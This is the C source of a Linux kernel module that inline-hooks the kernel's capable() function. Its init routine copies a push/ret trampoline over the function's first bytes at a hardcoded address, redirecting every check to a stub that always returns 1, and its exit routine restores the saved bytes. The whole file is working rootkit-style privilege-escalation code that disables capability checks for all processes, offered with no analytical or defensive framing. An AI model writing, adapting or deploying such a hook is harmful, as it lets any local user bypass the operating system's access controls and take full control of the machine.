#include "kmem_patch.h" 

#define CODESIZE 6
int (*real_capable)(int) = (int (*)(int))0xc012d2a0;
//capable_vaddr;

static char original_cap_code[6];
static char cap_code[6] =
"\x68\x00\x00\x00\x00" /* pushl $0x0 */
"\xc3"; 	       /* ret	     */

void *_memcpy(void *dest, const void *src, int size)
{
	const char *p = src;
	char *q = dest;
	int i;

	for (i = 0; i < size; i++) *q++ = *p++;

	return dest;
}

int _capable(int val)
{
	return 1;
}

int patch_it(void)
{
	printk(KERN_INFO "patching cap_code");
	/* patch our push/ret code with new vaddr */
	*(long *)&cap_code[1] = (long)_capable;
	
	printk(KERN_INFO "backup up original code");

	/* backup original code to capable() */
	_memcpy(original_cap_code, real_capable, CODESIZE);

	printk(KERN_INFO "modifying capable() with jmp code");
	/* now overwrite first 6 bytes of capable() with */
	/* code to jmp to our new function _capable() */
	_memcpy((char *)real_capable, (char *)cap_code, CODESIZE);
}

int unpatch_it(void)
{
	_memcpy(real_capable, original_cap_code, CODESIZE);
}

module_init(patch_it);
module_exit(unpatch_it);  



